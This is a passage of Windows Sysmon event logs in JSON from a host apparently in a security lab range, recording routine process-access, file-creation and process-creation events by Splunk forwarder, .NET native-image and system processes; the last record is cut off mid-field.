{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6537,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.539\r\nSourceProcessGUID: {41C8662E-21DD-5F25-0000-0010BC200A00}\r\nSourceProcessId: 3252\r\nSourceThreadId: 4652\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.539","SourceProcessGUID":"{41C8662E-21DD-5F25-0000-0010BC200A00}","SourceProcessId":"3252","SourceThreadId":"4652","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6538,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:03:41.664\r\nProcessGuid: {41C8662E-21DC-5F25-0000-0010E21B0A00}\r\nProcessId: 3492\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\da4-0\\System.Drawing.dll\r\nCreationUtcTime: 2020-08-01 08:03:41.664","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:03:41.664","ProcessGuid":"{41C8662E-21DC-5F25-0000-0010E21B0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\da4-0\\System.Drawing.dll","CreationUtcTime":"2020-08-01 08:03:41.664","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6539,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.711\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21DD-5F25-0000-0010DE220A00}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.711","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21DD-5F25-0000-0010DE220A00}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6540,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.711\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21DD-5F25-0000-0010DE220A00}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.711","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21DD-5F25-0000-0010DE220A00}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6541,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.711\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21DD-5F25-0000-0010DE220A00}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.711","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21DD-5F25-0000-0010DE220A00}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6542,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.054\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21DE-5F25-0000-0010E6260A00}\r\nTargetProcessId: 3984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.054","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21DE-5F25-0000-0010E6260A00}","TargetProcessId":"3984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6543,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.054\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21DE-5F25-0000-0010E6260A00}\r\nTargetProcessId: 3984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.054","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21DE-5F25-0000-0010E6260A00}","TargetProcessId":"3984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6544,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nProcessGuid: {41C8662E-21DE-5F25-0000-00103B270A00}\r\nProcessId: 3268\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","ProcessGuid":"{41C8662E-21DE-5F25-0000-00103B270A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6545,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21DE-5F25-0000-00103B270A00}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21DE-5F25-0000-00103B270A00}","TargetProcessId":"3268","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program 